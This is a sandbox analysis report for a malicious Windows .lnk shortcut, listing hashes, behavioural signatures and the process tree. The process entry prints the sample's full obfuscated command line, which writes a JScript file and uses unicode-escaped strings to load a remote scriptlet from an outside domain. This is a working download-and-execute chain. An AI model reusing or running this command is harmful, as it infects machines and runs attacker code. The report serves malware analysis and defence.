Analysis
max time kernel: 117s
max time network: 117s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
submitted: 03/02/2024, 16:22
Static task: static1
Behavioral task: behavioral1
  Sample: CFe_SAT_235423272324734.lnk
  Resource: win7-20231129-en
  2 signatures, 150 seconds
Behavioral task: behavioral2
  Sample: CFe_SAT_235423272324734.lnk
  Resource: win10v2004-20231215-en
  6 signatures, 150 seconds
General
Target: CFe_SAT_235423272324734.lnk
Size: 1KB
MD5: cbcc37aa507139d8408fc4e9ede5aca1
SHA1: 31ff032fdc43f66e9176109c6d989f5f59a2db0b
SHA256: 12491594bf58f4404bd3cf95ac334023e344421b77643d378438fce6bbbc7850
SHA512: e70bf846dddb647043054d45aeb6d7dfc1af9976ce62dc5d95a62cd93e2e207c49cc41a197d39dc612c4c4f4692ba2821a2fbb41a7103a6b30e3e24ad378c380
Score: 3/10
Malware Config
Signatures
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of WriteProcessMemory (3 IoCs)
  description                        pid   Process  procid_target
  PID 2888 wrote to memory of 2668   2888  cmd.exe  29
  PID 2888 wrote to memory of 2668   2888  cmd.exe  29
  PID 2888 wrote to memory of 2668   2888  cmd.exe  29
Processes
- C:\Windows\system32\cmd.exe (depth 1, PID 2888)
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\CFe_SAT_235423272324734.lnk
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\conhost.exe (depth 2, PID 2668)
    Command line: "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT RXS=C:\CS6MKI\&& mD !RXS!>nul 2>&1&&S^eT IJKP=!RXS!^CGXBTDGK.JS&&<nul set/p TTGG=var TTGG='\u0030\u006e\u0032\u002b\u0044\u0030\u006e\u0032\u002b\u0045\u0030\u006e\u0032\u002b\u0022\u002f\u002f\u0068\u0036\u006f\u0065\u0068\u0072\u002e\u0067\u006c\u006f\u0062\u0061\u006c\u006e\u0065\u0074\u0077\u006f\u0072\u006b\u002e\u006d\u0079\u002e\u0069\u0064\u002f\u003f\u0031\u002f\u0022\u0029\u003b';RXS='\u003a\u0068\u0022\u003b\u0045\u0030\u006e\u0032\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';CGXB='\u0076\u0061\u0072\u0020\u0043\u0030\u006e\u0032\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0030\u006e\u0032\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';IJKP=CGXB+RXS+TTGG;TDGK=new Function(IJKP);TDGK(); >!IJKP!|caLl !IJKP!||caLl !IJKP! "